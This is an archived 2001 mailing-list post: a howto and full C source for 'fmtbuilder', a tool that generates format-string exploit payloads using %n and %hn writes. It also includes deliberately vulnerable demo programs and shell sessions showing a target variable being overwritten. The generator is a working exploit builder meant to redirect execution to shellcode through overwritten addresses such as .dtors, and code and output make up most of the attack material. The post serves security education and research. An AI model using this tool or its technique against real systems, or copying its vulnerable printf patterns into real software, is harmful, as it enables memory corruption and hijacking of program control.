format string builder howto v0.1

From: Frederic.Raynalat_private
Date: Fri Aug 03 2001 - 03:11:34 PDT

  • Next message: Tony Lambiris: "slackware permissions"

    FMTBUILDER-Howto version 0.1
    
    ----------------------------------------------------------------
        Frederic "Pappy" Raynal <frederic.raynalat_private>
        Samuel "Zorgon" Dralet <samuel.draletat_private>
    ----------------------------------------------------------------
    
    Date: 08/03/01
    
    [ Contents ]
    
    1.  Introduction
    2.  Usage
    3.  Example
    4.  Notations and goals
    5.  Solution
    6.  %n way
    7.  %hn way
    8.  What if some text is placed before the format string
    9.  Alignment
    10. Example: base and alignment
    11. Greetings
    12. References
    13. Appendix
     
    
    ----------------------------------------------------------------
    
    -------{ 1. Introduction
    
    This document focuses on building format strings to exploit format
    bugs. The reader is supposed to know what they are and howto exploit
    tham, which won't be remind here.
    
    
    fmtbuider is a small program that aim at building format strings. In
    this document, we explain the methods and tricks used to achieve this
    goal. 
    
    -------{ 2. Usage
    
    Usage : ./fmtbuilder [-nh] -a <locaddr> -v <retaddr> -o <offset>
    
      -a <locaddr> : <locaddr> is the address to overwrite ( .dtors for instance )
    
      -r <retaddr> : <retaddr> is the address where we expect to return,
                     for instance because a shellcode is waiting for us ;)
    
      -o <offset>  : distance (in words) to reach the beginning of our
                     buffer (i.e. used with the $ format - see printf(3) )
    
      -b <base>    : <base> is the amount of char placed before the our
                     own part of the format string.
    
    Two building methods, each with its own pros and cons, are available:
      
      -n :	Format string with %n
      -h :	Format string with %hn
    
    
    -------{ 3. Example
    
    For our educational purpose, we need a very easy vulnerable program:
    
    /* formatme1.c */
    int main( int argc, char ** argv ) 
    {
      int bar;
      int foo = 0x41414141;
      char fmt[128];
    
      memset( fmt, 0, sizeof(fmt) );
      printf( "foo at 0x%x\n", &foo );
      printf( "argv[1] = [%s] (%d)\n", argv[1], strlen(argv[1]) );
      snprintf( fmt, sizeof(fmt), argv[1] );
      printf( "fmt=[%s] (%d)\n", fmt, strlen(fmt) );
      printf( "foo=0x%x\n", foo );
    }
    
    Our goal is to change the value of foo to 0x0430201.
    So, we just need to discover the offset to the beginning of our
    buffer:
    
    $ gcc -o formatme1 formatme1.c
    $ ./formatme1 BBBB%2$\x
    foo at 0xbffff8f8
    argv[1] = [BBBB%2$x] (8)
    fmt=[BBBB42424242] (12)
    foo=0x41414141
    
    et hop : it is 2 :)
    Since our program gives the address of "foo", we just have to run it:
    
    $ ./formatme1 `./fmtbuilder -r 0x04030201 -a 0xbffff8f8 -b 0 -o 2 -n`
    Format string builder
    [ align = 0 ]
    [ str = øøÿ¿ùøÿ¿úøÿ¿ûøÿ¿%241x%2$n%257x%3$n%257x%4$n%257x%5$n] (52)
    foo at 0xbffff8d8
    argv[1] = [øøÿ¿ùøÿ¿úøÿ¿ûøÿ¿%241x%2$n%257x%3$n%257x%4$n%257x%5$n] (52)
    fmt=[øøÿ¿ùøÿ¿úøÿ¿ûøÿ¿                                           
                                                                        ] (127)
    foo=0x41414141
    
    Ok, this first run never works because the position of foo changes
    when a long string is pt in the stack. But the right address is
    displayed by our nice program (foo at 0xbffff8d8):
    
    $ ./formatme1 `./fmtbuilder -r 0x04030201 -a 0xbffff8d8 -b 0 -o 2 -n`
    Format string builder
    [ align = 0 ]
    [ str = Øøÿ¿Ùøÿ¿Úøÿ¿Ûøÿ¿%241x%2$n%257x%3$n%257x%4$n%257x%5$n ] (52)
    foo at 0xbffff8d8
    argv[1] = [Øøÿ¿Ùøÿ¿Úøÿ¿Ûøÿ¿%241x%2$n%257x%3$n%257x%4$n%257x%5$n] (52)
    fmt=[Øøÿ¿Ùøÿ¿Úøÿ¿Ûøÿ¿                                                          
                                                         ] (127)
    foo=0x4030201
    
    And with the %hn (just the last option and the address of foo to
    change): 
    
    $ ./formatme1 `./fmtbuilder -r 0x04030201 -a 0xbffff8e8 -b 0 -o 2 -h`
    Format string builder
    [ align = 0 ]
    [ str = èøÿ¿êøÿ¿%.66041x%2$n%.66050x%3$hn ] (33)
    foo at 0xbffff8e8
    argv[1] = [èøÿ¿êøÿ¿%.66041x%2$n%.66050x%3$hn] (33)
    fmt=[èøÿ¿êøÿ¿00000000000000000000000000000000000000000000000000000000
         000000000000000000000000000000000000000000000000000000000000000] (127)
    foo=0x4030201
    
    
    -------{ 4. Notations and goals
    
    
    a 32-bits address is noted [b3 b2 b1 b0] where :
      - b0 = ( addr >> 24 ) & 0xff;
      - b1 = ( addr >> 16 ) & 0xff;
      - b2 = ( addr >>  8 ) & 0xff;
      - b3 = ( addr       ) & 0xff;
    
    Suppose we wants to write x0 to b0, x1 to b1... (where xi is an
    unsigned char in { 0...255 }).
    
    Independently from the method used to write (%n or %hn), since %n is
    strictly increasing, troubles occur as soon as we don't have
    x3 < x2 < x1 < x0 which is almost always the case ;(
    
    One needs a trick ... and (can you hear the drums rolls;) here it
    comes : the solution is always to force that inequality to be true !
    
    Yes, it seems incredible, isn't it ;)))
    
    
    -------{ 5. Solution
    
    
    A simple but inefficient solution would be to sort each of the xi, but
    that leads to a very painful algorithm since there is 4! = 4 * 3 * 2 * 1 = 24 
    available permutations (and thus as much "special cases" to handle)
    
    We said that the xi's are in { 0...255 } ... but we are going to put
    them in { 256...511 }, by simply adding 256 to each value. And so, one
    byte is no more enough to hold the value, but that is really no matter
    since we are going to use several writings:
    
      for one writing, we are only interested in the last of the 2 bytes, 
      the next writing erasing the other (garbage) byte.
    
    
    [ Example ]
    
    Let's x3 = 0x44, x2 = 0x33, x1 = 0x0f and x0 = 0x01
    
    One wants to put in memory [ 0x44 0x33 0x02 0x01 ] ... but
    unfortunately, 0x44 > 0x33
    
    Nevertheless, 0x44 < 0x0133 :)   <- Here is the solution :)
    
    Rather than writing the expected value at a given position, one has to 
    consider this value plus 0x0100. Since the value to write is in
    { 0...255 }, the written one will be in { 0...255 } + 0x0100 = { 256...511 } 
    and is now coded with 2 bytes.
    
    |---------------------------|------------------------|---------------------|
    |     bytes                 |        total           |      retaddr        |
    |---------------------------|------------------------|---------------------|
    | 0x44+0x0100      = 0x0144 |          0x0144        | 0x44 0x01   X    X  |
    | 0x33+0x0100-0x44 = 0x00ef | 0x0144+0x00ef = 0x0233 | 0x44 0x33 0x02   X  |
    | 0x0f+0x0100-0x33 = 0x00dc | 0x0203+0x00dc = 0x030f | 0x44 0x33 0x0f 0x03 |
    | 0x01+0x0100-0x0f = 0x00f2 | 0x030f+0x00f2 = 0x0401 | 0x44 0x33 0x0f 0x01 |
    |---------------------------|------------------------|---------------------| 
    ( X = undefined )
    
    
    As you can notice in the above table, the "garbage byte" always
    increases and that is what ensures the inequality to be always true.
    
    
    -------{ 6. %n way
    
    The format string is built using 4 consecutive writings %n, (almost)
    as described in Kalou's article (see the references). 
    
    The only difference is the use of the previous trick, which really
    makes life easier ;)
    
    pros:
      - sometimes, format bugs are also overflow:
    
        int main( int argc, char ** argv ) 
        {
            char buf[64];
            sprintf( buf, argv[1] );
        }
    
        Trying to exploit this with %hn will lead to an overflow: the
        string formatted by argv[1] will expand but since no check is
        done, it will overflow the buffer and coredump.
    
    cons:
      - the string is longer than with the %hn: one needs the 4 %x, one
        for each %n
    
      - can overwrite something that is no more in the format string: as
        shown in the example, writing with %n gets out of bounds. This
        could become annoying if it changes the value of something
        important:
    
          + a variable (or a pointer):
                         int i = 0;    
                         char fmt[64];
                         ...
                         printf(fmt);
    
          + the saved %ebp:
                         void foo() {
                           char fmt[64];
                           ...
                           printf(fmt);
    
    
    -------{ 7. %hn way
    
    
    In a previous article about format bugs, I introduced another solution
    to build the format string using %hn. This solves the cons of the %n
    approach :
    
      - the string is shorter since you just need 2 %x before the %hn
      - you don't overwrite anything after the format string since you
        write only 2 short int (2 bytes each)
    
    Unfortunately, the %hn approach has to face the same problem as with
    %n: the count is strictly increasing ... but almost the same solution
    allows to solve that ;)
    
    In the article, I used a format string looking like that :
    
              %[val1]x%[val2]x%[offset]hn%[offset+2]hn
    
    Now, rather than using 2 %hn, we use firstly a %n and then a %hn. The
    first %n writes to all the retaddr, even if only the last 2 bytes are
    interesting (i.e. the ones we expect). Then, the %hn overwrite those 2
    "garbage" bytes with the exact value, without overflowing after the
    address. 
    
    With the %n technique, the values are in { 0...255 }. Since we now use 2
    bytes, they are now in { 0...255 * 255 }. So, to be greater than the
    previous written value, adding 0x0100 is no more enough, so we add
    0x0100 * 0x0100 = 0x010000 instead.
    
    
    [ Example ]
    
    We still consider the same values as in the previous example.
    
    The first short we have to write is the low part : 0x4433 but
    unfortunately, 0x4433 > 0x0f01
    Nevertheless, 0x4433 < 0x010f01.
    
    Rather than writing the expected value at a given position, one has to
    consider this value plus 0x010000. Since the value to write is in
    { 0...65535 }, the written one will be in { 0...65535 } + 0x010000 = 
    { 65536...131071 } and is now coded with 3 bytes (ok, 4... but the
    last one will be zero)
    
    
    |-----------------------------|------------------------|---------------------|
    |         bytes               |        total           |      retaddr        |
    |-----------------------------|------------------------|---------------------|
    |0x4433+0x010000=0x014433     |      0x014433	       | 0x44 0x33 0x01   X  |
    |0x0f01+0x010000-0x4433=0xcace|0x014433+0xcace=0x020f01| 0x44 0x33 0x0f 0x01 |
    |-----------------------------|------------------------|---------------------|
    
    The second writing is truncated because of the %hn: it cast the value
    to a short int and hence keeps only the last two bytes, which are
    exactly what we want.
    
    
    -------{ 8. What if some text is placed before the format string
     
    
    That's no big deal ;)
    If you look in the sources (always look in the source, Luke;) you will
    notice that having some character before the format string or not
    makes almost no difference.
    
    What is done to handle values xi smaller than the previous ones
    (i.e. adding 0x0100 - 0x010000 - to this value) is also usable to
    handle what we call the "base" (these first char) : we also add
    0x0100 (or 0x010000) to the very first value to be sure that our last
    char will be the one we expect.
    
    3 situations are possible:
      1. base <  x3 : we just have to write x3-base in our format
      2. base == x3 : idem
      3. base >  x3 : x3 has to be increased to exceed "base" 
    
    
    But since adding 0x0100 (0x010000) doesn't change our target byte(s),
    we can continue that way. So, we have to add ( base / 0x0100 ) + 1
    (resp. (base / 0x010000) + 1) to x3 to be greater than "base".
    
    [ Example ] 
    
    Take base = 0x0224 (548) (yes, I know, that will never be like that... it
    is just to show that our algo is not so bad ;) and x3 = 0x44.
    
    Using the %n approach, adding only 0x0100 is not enough
    ( 0x0100 + 0x44 = 0x0144 < 0x0224 ) So, we have to add 0x0100 until we are
    greater than 0x0224 ... which is exactly given by ( 0x0224 / 0x0100 + 1 = 3 ).
    
    Finally, the first writing is :
    0x44 + 3 * 0x0100 - 0x0224 = 0x0120
    
    Like that, we have written 0x120 + 0x0224 = 0x0344 char for our first
    %n: as you  can see, the last byte is the one expected :)
    
    -------{ 9. Alignment
    
    When dealing with buffer overflows, one has to take care about the
    alignment in memory. With format bugs, this is almost never useful :)
    
    The string used as format string is aligned in memory. The only thing
    that could break that occurs when some char are already in the string
    that is going to be exploited.
    
    For instance, if the string contains "Alert" before being submitted to
    our will, one will have to add 3 char just after so that the length is
    multiple of 4, and thus aligned in memory : "AlertXXX".
    
    We call "base" the length of those char previously in the string.
    
    More generally, one just have to add ( 4 - base%4 ) (% means modulo) to
    base to have a string that is well aligned.
    
    A great care has to be taken when alignment in non-zero to discover
    the offset. One can not expect anymore to retrieve his "marker" in a
    full word. See the following example for further details.
    
    -------{ 10. Example: base and alignment
    
    /* formatme2.c */
    int main( int argc, char **argv ) 
    {
      int bar;
      int foo = 0x41414141;
      char buffer[1024];
    
      snprintf( buffer, sizeof(buffer), "%s%s", argv[1], argv[2] );
      printf( "foo is at 0x%x\n", &foo );
      printf( buffer );
      printf( "\nfoo=0x%x\n", foo );
    }
    
    We will use an unaligned input string "ABCDE", so we start by guessing
    the offset:
    
    $ ./formatme2 ABCDE BBBB%5\$x
    foo is at 0xbffff7c8
    ABCDEBBBB42424245
    foo=0x41414141
    
    $ ./formatme2 ABCDE BBBB%6\$x
    foo is at 0xbffff7c8
    ABCDEBBBB24362542
    foo=0x41414141
    
    We retrieve our BBBB across both offsets 5 and 6. Since we are going
    to add char to align the buffer, we have to use the upper one (6):
    
    $ ./formatme2 ABCDE `./fmtbuilder -r 0x04030201 -a 0xbffff798 -b 5 -o 6 -n`
    Format string builder
    [ align = 3 ]
    [ str = ÷ÿ¿÷ÿ¿÷ÿ¿÷ÿ¿%233x%6$n%257x%7$n%257x%8$n%257x%9$n ] (52)
    foo is at 0xbffff798
    ABCDEFGXXX÷ÿ¿÷ÿ¿÷ÿ¿÷ÿ¿                                                
    ...
     bffff798
    ...
     4015e000
    ...
     bffff74c
    ...      44434241
    foo=0x4030201
    
    Great :)
    
    $ ./formatme2 ABCDE `./fmtbuilder -r 0x04030201 -a 0xbffff7a8 -b 5 -o 6 -h` 
    Format string builder
    [ align = 3 ]
    [ str = ÷ÿ¿ª÷ÿ¿%.66033x%6$n%.66050x%7$hn ] (33)
    foo is at 0xbffff7a8
    ABCDEXXX¨÷ÿ¿ª÷ÿ¿00000000000000000000000000000000000000000000000 ...
    ...
    ...
    ...
    ...
    00000000000000000000000000000000000000000000000000000004015e000
    foo=0x4030201
    
    Still fine :) Lines full of 0 are cut.
    
    
    -------{ 11. Greetings
    
    To Christophe "Korty" Bailleux for having submitted to us the
    problem of automatic format string builder and all his comments.
    
    -------{ 12. References
    
    How to learn more about format strings ?
    
    [1] "More info on format bugs"
        Pascal "kalou" Bouchareine <pbat_private>
    
    [2] "Format Bugs: What are they, Where did they come from,...
         How to exploit them "
        Lamagra <lamagraat_private> 	
    
    [3] "Avoiding security holes when developing an application - 4:
         Format strings"
        Frederic "pappy" Raynal <frederic.raynalat_private> 
        Christophe Grenier <cgr@global-secure.fr>
        Christophe Blaess <ccb@club-internet.fr>
    
    -------{ 13. Appendix
    /* 
     * Copyright (C) 2001  Frederic "Pappy" Raynal <frederic.raynalat_private>
     * Copyright (C) 2001  Samuel "Zorgon" Dralet <samuel.draletat_private>
     *
     * This program is free software; you can redistribute it and/or modify
     * it under the terms of the GNU General Public License as published by
     * the Free Software Foundation; either version 2 of the License, or (at
     * your option) any later version.
     * 
     * This program is distributed in the hope that it will be useful,
     * but WITHOUT ANY WARRANTY; without even the implied warranty of
     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
     * General Public License for more details.
     *
     * You should have received a copy of the GNU General Public License
     * along with this program; if not, write to the Free Software
     * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
     * USA
     *
     */
    
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    
    #define ADD     0x100   
    #define OCT( b0, b1, b2, b3, addr ) { \
                    b0 = (addr >> 24) & 0xff; \
                    b1 = (addr >> 16) & 0xff; \
                    b2 = (addr >>  8) & 0xff; \
                    b3 = (addr      ) & 0xff; \
            }
    
    void 
    usage (char * cmd )
    {
    
      fprintf(stderr, "------------------------------------------------------------
    ----\n");
      fprintf( stderr, "                   Format string builder\n" );
      fprintf(stderr, "       Frederic \"Pappy\" Raynal <frederic.raynalat_private>
    \n");
      fprintf(stderr, "    Samuel \"Zorgon\" Dralet <samuel.draletat_private
    r>\n");
      fprintf(stderr, "------------------------------------------------------------
    ----\n");
    
      fprintf( stderr, "\n" );
      fprintf( stderr, "Usage : %s [-nh] -a <locaddr> -v <retaddr> -o <offset>\n", 
    cmd );
      fprintf( stderr, "  -n :\tFormat string with %%n\n");
      fprintf( stderr, "  -h :\tFormat string with %%hn\n");
      fprintf( stderr, "  -a <locaddr> : address to overwrite (like .dtors)\n");
      fprintf( stderr, "  -r <retaddr> : where we want to return (shellcode)\n" );
      fprintf( stderr, "  -o <offset>  : distance in 'words' to reach the part of 
    the buffer we control\n" );
      fprintf( stderr, "  -b <base>    : amount of char previously in the 
    string\n\n" );
      fprintf( stderr, "E.g: %s -n -a 0x080495e8 -r 0x01020304 -o 4 -b 0\n\n", cmd 
    );
      fprintf( stderr, "[EOF]\n\n" );
    }
    
    char *
    build_un( unsigned int retaddr, unsigned int offset, unsigned int base )
    {
      char * buf;
    
      /* on calcule ou on laisse comme ca */
      unsigned int length = 128;
      unsigned char b0, b1, b2, b3;
      int start = ((base / ADD) + 1)*ADD;
      
      fprintf(stderr, "start=%d\n", start);
    
    
      OCT( b0, b1, b2, b3, retaddr );
      if ( !(buf = (char *)malloc(length * sizeof(char))) ) {
        fprintf( stderr, "Can't allocate buffer (%d)\n", length );
        exit( -1 );
      }
      memset( buf, 0, length ); 
    
      snprintf( buf, length, 
                "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
                b3 - (sizeof( size_t ) * 4) + start - base, offset,
                b2 - b3 + start, offset + 1,
                b1 - b2 + start, offset + 2,
                b0 - b1 + start, offset + 3 );
    
      return buf;
    }
    
    char * 
    build_hn( unsigned int retaddr, unsigned int offset, unsigned int base )
    {
      unsigned int length; 
      unsigned int high, low;
      char * buf;
      int start = ((base / (ADD*ADD)) + 1)*ADD*ADD;
    
      high = ( retaddr & 0xffff0000 ) >> 16; 
      low = retaddr & 0x0000ffff;      
    
      /* Certainement a recalculer  ou egale a 128*/
      length = ( sizeof( offset ) * 2 ) + sizeof( high ) + sizeof( low ) + 15;
      if ( !(buf = (char *)malloc(length * sizeof(char))) ) {
        fprintf( stderr, "Can't allocate buffer (%d)\n", length );
        exit( -1 );
      }
      memset( buf, 0, length );
    
      snprintf( buf, length, 
                "%%.%hdx%%%d$n%%.%hdx%%%d$hn", 
                low - ( sizeof( size_t ) * 2 ) + start - base, 
                offset, 
                high - low + start, 
                offset+1 );
      return buf;
    }
    
    int 
    main( int argc, char * argv[] )
    {
            
      char opt;
      char * fmt;
      char * endian; /* la partie de la chaine contenant les adresses à écraser */
      unsigned long locaddr, retaddr;
      unsigned int offset, base, align = 0;
      unsigned char b0, b1, b2, b3;
      int length, ch;
     
      if ( argc != 10 ) {
        usage( argv[0] );
        exit( -1 );
      }
    
      length = ( sizeof( size_t ) * 16 ) + 1; 
    
      if ( !(endian = (char *)malloc(length * sizeof(char))) ) {
        fprintf( stderr, "Can't allocate buffer (%d)\n", length );
        exit( -1 );
      }
      memset( endian, 0, length );
    
      while ( (opt = getopt( argc, argv, "nha:r:o:b:" )) != EOF )
        switch( opt )
          {
            case 'n':
              ch = 0;
              break;
            case 'h':
              ch = 1;
              break;
            case 'a':
              locaddr = strtoul( optarg, NULL, 16 );
              break;
            case 'r':
              retaddr = strtoul( optarg, NULL, 16 );
              break;
            case 'o':
              offset = atoi( optarg );
              break;
            case 'b':
              base = atoi( optarg );
              break;
            default:
              usage(argv[0]);
              exit( -1 );
          }
    
      OCT( b0, b1, b2, b3, locaddr );
    
      if ( base%4 ) {
        align = 4 - ( base%4 );
        base += align;
      }
    
      if ( ch == 0 ) {
        snprintf( endian, length, 
                  "%c%c%c%c"
                  "%c%c%c%c"
                  "%c%c%c%c"
                  "%c%c%c%c",
                  b3, b2, b1, b0,
                  b3 + 1, b2, b1, b0,
                  b3 + 2, b2, b1, b0,
                  b3 + 3, b2, b1, b0 );
        fmt = build_un( retaddr, offset, base );
      }
      else {
        snprintf( endian, length,
                  "%c%c%c%c"
                  "%c%c%c%c",
                  b3, b2, b1, b0,
                  b3 + 2, b2, b1, b0 );
    
        fmt = build_hn( retaddr, offset, base );
      }
            
    
      fprintf(stderr, "align=%d\n", align);
      fprintf( stderr, "str=[%s%s] (%d)", endian, fmt, strlen(endian)+strlen(fmt) 
    );
      for( ; align>0; --align) 
        printf("X");
      printf( "%s%s", endian, fmt );
      fprintf(stderr, "\n");
      return( 0 );
    }
    



    This archive was generated by hypermail 2b30 : Fri Aug 03 2001 - 10:35:46 PDT